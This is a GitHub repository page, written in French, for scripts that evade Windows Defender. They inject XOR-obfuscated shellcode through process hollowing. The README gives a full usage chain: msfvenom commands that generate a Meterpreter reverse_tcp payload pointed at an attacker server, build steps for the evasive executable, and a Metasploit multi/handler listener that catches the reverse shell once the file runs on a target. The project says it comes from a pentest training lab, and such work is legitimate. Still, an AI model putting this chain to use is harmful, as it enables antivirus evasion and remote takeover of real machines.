Skip to content

Scripts permettant de contourner la protection antivirale de Windows Defender via la technique de Process Hollowing avec une injection de shellcode préalablement obfusqué avec un fonction XOR.

Notifications You must be signed in to change notification settings

ProcessusT/Bypass-AV-ProcessHollowing

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

9 Commits
 
 
 
 
 
 

Repository files navigation

Scripts permettant de contourner la protection antivirale de Windows Defender via la technique de Process Hollowing avec une injection de shellcode préalablement obfusqué avec un fonction XOR.

Ces derniers ont été utilisés dans un lab d'entrainement au pentest et ne sont pas prévus pour être utilisés en dehors de ce cadre.




Ma vidéo sur le sujet : https://youtu.be/CTkbSiOBi58




Bypass-AV-ProcessHollowing

Ce projet est basé sur le dépôt Github de chvancooten :
https://github.com/chvancooten/OSEP-Code-Snippets



Utilisation

  1. Générer un meterpreter Metasploit sous la forme d'un shellcode avec msfvenom :
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<SERVER> LPORT=<PORT> -f csharp
  1. Créer un nouveau projet DotNet dans Visual Studio Code :
dotnet new console
  1. Remplacer le contenu de Program.cs par le contenu du fichier XorCipher.cs et remplacer le shellcode par celui généré avec msfvenom
  2. Générer la solution sous la forme d'un fichier PE avec ses librairies embarquée :
dotnet publish -p:PublishSingleFile=true -r win-x64 -c Release --self-contained true -p:PublishTrimmed=true
  1. Exécuter le fichier compilé dans une invite de commande :
.\XorCipher.exe
  1. Créer un second projet DotNet dans une autre instance de Visual Studio Code :
dotnet new console
  1. Remplacer le contenu de Program.cs par le contenu du fichier ProcessHollowing.cs et remplacer le shellcode par celui généré avec XorCipher.exe
  2. Générer la solution sous la forme d'un fichier PE avec ses librairies embarquée :
dotnet publish -p:PublishSingleFile=true -r win-x64 -c Release --self-contained true -p:PublishTrimmed=true
  1. Lancer un listener dans la console metasploit :
msfconsole
use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost <SERVER>
set lport <PORT>
exploit
  1. Exécuter le fichier ProcessHollowing.exe sur le poste cible puis savourer un délicieux cookie aux pépites de chocolat :)

Le lien de mon blog : https://lestutosdeprocessus.fr

Le lien pour rejoindre le serveur Discord : https://discord.gg/JJNxV2h

About

Scripts permettant de contourner la protection antivirale de Windows Defender via la technique de Process Hollowing avec une injection de shellcode préalablement obfusqué avec un fonction XOR.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages